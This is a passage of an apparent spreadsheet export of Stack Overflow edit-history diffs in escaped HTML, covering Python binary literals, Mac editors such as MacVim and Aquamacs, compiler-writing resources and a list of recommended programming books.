&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="diff-add"&gt;bday&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;today&lt;/span&gt;.&lt;span class="diff-add"&gt;AddYears&lt;/span&gt;(&lt;span class="diff-add"&gt;-age&lt;/span&gt;)) &lt;span class="diff-add"&gt;age&lt;/span&gt;--;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>TheCloudlessSky</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you express an integer as a binary number with python literals?&lt;/p&gt; _x000D_
 &lt;p&gt; I was easily able to find the answer for hex:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="hljs-number"&gt;0x12AF&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4783&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="hljs-number"&gt;0x100&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;256&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and, octal:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;01267_x000D_
&lt;span class="hljs-number"&gt;695&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;0100_x000D_
&lt;span class="hljs-number"&gt;64&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;How do you use literals to express binary in python?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; TESTING ROLLBACK&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Summary of Answers&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Python 2.5 and earlier: can express binary using &lt;code&gt;int('01010101111',2)&lt;/code&gt; but not with a literal.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.5 and earlier: there is &lt;em&gt;no way&lt;/em&gt; to express binary literals.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.6 beta: You can do like so: &lt;code&gt;0b1100111&lt;/code&gt; or &lt;code&gt;0B1100111&lt;/code&gt; .&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.6 beta: will also allow &lt;code&gt;0o27&lt;/code&gt; or &lt;code&gt;0O27&lt;/code&gt; (second character is the letter O) to represent an octal.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 3.0 beta: Same as 2.6, but will no longer allow the older &lt;code&gt;027&lt;/code&gt; syntax for octals.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do you express an integer as a binary number with python literals?&lt;/p&gt; _x000D_
 &lt;p&gt; I was easily able to find the answer for hex:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="hljs-number"&gt;0x12AF&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;4783&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="hljs-number"&gt;0x100&lt;/span&gt;_x000D_
&lt;span class="hljs-number"&gt;256&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and, octal:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;01267_x000D_
&lt;span class="hljs-number"&gt;695&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;0100_x000D_
&lt;span class="hljs-number"&gt;64&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;How do you use literals to express binary in python?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Summary of Answers&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Python 2.5 and earlier: can express binary using &lt;code&gt;int('01010101111',2)&lt;/code&gt; but not with a literal.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.5 and earlier: there is &lt;em&gt;no way&lt;/em&gt; to express binary literals.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.6 beta: You can do like so: &lt;code&gt;0b1100111&lt;/code&gt; or &lt;code&gt;0B1100111&lt;/code&gt; .&lt;/li&gt; _x000D_
  &lt;li&gt; Python 2.6 beta: will also allow &lt;code&gt;0o27&lt;/code&gt; or &lt;code&gt;0O27&lt;/code&gt; (second character is the letter O) to represent an octal.&lt;/li&gt; _x000D_
  &lt;li&gt; Python 3.0 beta: Same as 2.6, but will no longer allow the older &lt;code&gt;027&lt;/code&gt; syntax for octals.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Justin Standard</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; MacVim&lt;/span&gt; works well and certainly looks more mature than Vim-Cocoa, moreover there is a Cocoa plugin architecture in the pipeline for MacVim (and someone is already working on a TextMate style file browser tray plugin which is a huge ++ IMHO)&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I&lt;/span&gt; also&lt;span class="diff-delete"&gt; remember&lt;/span&gt; a Carbon version of Vim, but this didn't offer a great deal over the Terminal version. i.e. only allowed one window open, not very OSX in appearence...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;i&gt;&lt;span class="diff-delete"&gt;EDIT - Thanks Michiel. Will check beyond the first screenshot next time!&lt;/span&gt;&lt;/i&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;i&gt;&lt;span class="diff-delete"&gt;In the interests of tact, this is the kind of answer that should probably be made community wiki editable. Can someone with the right priveleges do that and add the Emacs bits?&lt;/span&gt;&lt;/i&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;MacVim&lt;/span&gt;&lt;/strong&gt; works well and certainly looks more mature than Vim-Cocoa, moreover there is a Cocoa plugin architecture in the pipeline for MacVim (and someone is already working on a TextMate style file browser tray plugin which is a huge ++ IMHO)&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;There was&lt;/span&gt; also a Carbon version of Vim, but this didn't offer a great deal over the Terminal version. i.e. only allowed one window open, not very OSX in appearence...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Aquamacs&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; is very usable and looks pretty good. Supports both traditional Mac OS style keyboard shortcuts (command-O, command-S) and the Control/Meta shortcuts for those raised on traditional Emacs. It is definitely more Mac-like than Carbon Emacs. It seems stable and fast, but I am not an Emacs guru so I don't stress it all that much when I use it. I can't speak to the extensiveness of the included elisp packages, either.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Someone syncs Carbon Emacs with the upstream tree quarterly I think. Aquamacs has a more irregular schedule, but it's seen some pretty major updates over the last year.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brendan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am looking for some helpful books/tutorials on how to write your own compiler simply for educational purposes. I am most familiar with C/C++, Java, and Ruby so I prefer resources that involve one&lt;span class="diff-delete"&gt; of&lt;/span&gt; those three, but any good resource is acceptable.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am looking for some helpful books/tutorials on how to write your own compiler simply for educational purposes. I am most familiar with C/C++, Java, and Ruby so I prefer resources that involve one those three, but any good resource is acceptable&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Big List of Resources:&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://en.wikipedia.org/wiki/Compilers:_Principles%2C_Techniques%2C_and_Tools" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Dragon Book&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; - Widely considered "the book" for compiler writing. Chris Bunch also suggests to look at the Interpreter pattern in &lt;/span&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201633612" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Design Patterns&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/1931841578" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Game Scripting Mastery&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://msdn.microsoft.com/en-us/magazine/cc136756.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Roll Your Own Compiler for the .NET framework&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://compilers.iecc.com/crenshaw/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Lets Build a Compiler&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0521607647" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Modern Compiler Implementation in ML&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; - There is a &lt;/span&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/052182060X" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Java&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; and &lt;/span&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0521607655" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;C&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; version as well.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www-old.oberon.ethz.ch/WirthPubl/CBEAll.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Compiler Construction&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://tinyurl.com/5txtuk" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Linkers and Loaders&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://llvm.org/docs/tutorial/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;LLVM Tutorial&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://cm.bell-labs.com/who/ken/trust.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Reflections on Trusting and Trust&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.cs.vu.nl/%7Edick/PTAPG.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Parsing Techniques - A Practical Guide&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.cs.man.ac.uk/%7Epjj/farrell/compmain.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Compiler Basics&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.hokstad.com/writing-a-compiler-in-ruby-bottom-up-step-1.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Writing a Compiler in Ruby Bottom Up&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.cs.indiana.edu/%7Edyb/pubs/nano-jfp.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;A Nanopass Framework for Compiler Education&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://scheme2006.cs.uchicago.edu/11-ghuloum.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;An Incremental Approach to Compiler Construction&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.parrotblog.org/2008/03/targeting-parrot-vm.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Parrot Tutorial&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://prog21.dadgum.com/30.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Want to Write a Compiler?&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://flipcode.com/archives/articles.shtml" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Flipcode Article Archive&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.onlamp.com/pub/a/onlamp/2004/04/15/parrot_compiler_construction.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Building a Parrot Compiler&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www-old.oberon.ethz.ch/WirthPubl/ProjectOberon.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Project Oberon&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; - Look at chapter 13&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://research.microsoft.com/%7Esimonpj/papers/pj-lester-book/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Implementing Functional Languages&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If I forgot something already posted let me know in the comments or if you can edit the question yourself then go ahead and add it. I do plan on making it more organized than simply having a large list, but for now I'll use this as a start. Thank you everyone for your answers and if you find another good resource be sure to post it&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Anton</t>
  </si>
  <si>
    <t>jamesmillerio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you could go back in time and tell yourself to read a specific book at the beginning of your career as a developer, which book would it be?&lt;/p&gt; _x000D_
 &lt;p&gt; I expect this list to be varied and to cover a wide range of things.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;EDIT: Before adding a another book/answer, please search for it first and upvote the existing answer rather than adding it again.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; To search, use the search box in the upper-right corner. To search the answers of the current question, use &lt;code&gt;inquestion:this&lt;/code&gt;. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;inquestion:this "Code Complete"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/ekDLR.png" alt="alt text"&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you could go back in time and tell yourself to read a specific book at the beginning of your career as a developer, which book would it be?&lt;/p&gt; _x000D_
 &lt;p&gt; I expect this list to be varied and to cover a wide range of things.&lt;span class="diff-add"&gt; For me, the book would be Code Complete. After reading that book, I was able to get out of the immediate task mindset and begin to think about the bigger picture, quality and maintainability.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;EDIT: Before adding a another book/answer, please search for it first and upvote the existing answer rather than adding it again.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; To search, use the search box in the upper-right corner. To search the answers of the current question, use &lt;code&gt;inquestion:this&lt;/code&gt;. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;inquestion:this "Code Complete"_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/ekDLR.png" alt="alt text"&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dennis Williamson</t>
  </si>
  <si>
    <t>The Student</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Code Complete&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; (2nd edition) by Steve McConnell&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Pragmatic Programmer&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Structure and Interpretation of Computer Programs&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The C Programming Language&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Kernighan and Ritchie&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Introduction to Algorithms&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Cormen, Leiserson, Rivest &amp;amp; Stein&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Design Patterns&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by the Gang&lt;/span&gt; of &lt;span class="diff-delete"&gt;Four&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Refactoring: Improving the Design of Existing Code&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Mythical Man Month&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Art of Computer Programming&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Donald Knuth&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Compilers: Principles, Techniques and Tools&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Alfred V. Aho&lt;/span&gt;, &lt;span class="diff-delete"&gt;Ravi Sethi and Jeffrey D. Ullman&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;GÃ¶del, Escher, Bach&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Douglas Hofstadter&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Clean Code: A Handbook of Agile Software Craftsmanship&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Robert C. Martin&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Effective C++&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;More Effective C++&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;CODE&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Charles Petzold&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Programming Pearls&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Jon Bentley&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Working Effectively with Legacy Code&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Michael C&lt;/span&gt;.&lt;span class="diff-delete"&gt; Feathers&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Peopleware&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Demarco&lt;/span&gt; and &lt;span class="diff-delete"&gt;Lister&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Coders at Work&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Peter Seibel&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Surely You're Joking, Mr. Feynman!&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Effective Java&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; 2nd edition&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Patterns of Enterprise Application Architecture&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Martin Fowler&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Little Schemer&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Seasoned Schemer&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Why's (Poignant) Guide to Ruby&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Inmates Are Running The Asylum: Why High Tech Products Drive Us Crazy and How to Restore the Sanity&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Art of Unix Programming&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Test-Driven Development: By Example&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Kent Beck&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Practices of an Agile Developer&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Don't Make Me Think&lt;/span&gt;&lt;/em&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Agile Software Development, Principles, Patterns, and Practices&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Robert C&lt;/span&gt;.&lt;span class="diff-delete"&gt; Martin&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Domain Driven Designs&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Eric Evans&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;The Design of Everyday Things&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Donald Norman&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Modern C++ Design&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; by Andrei Alexandrescu&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
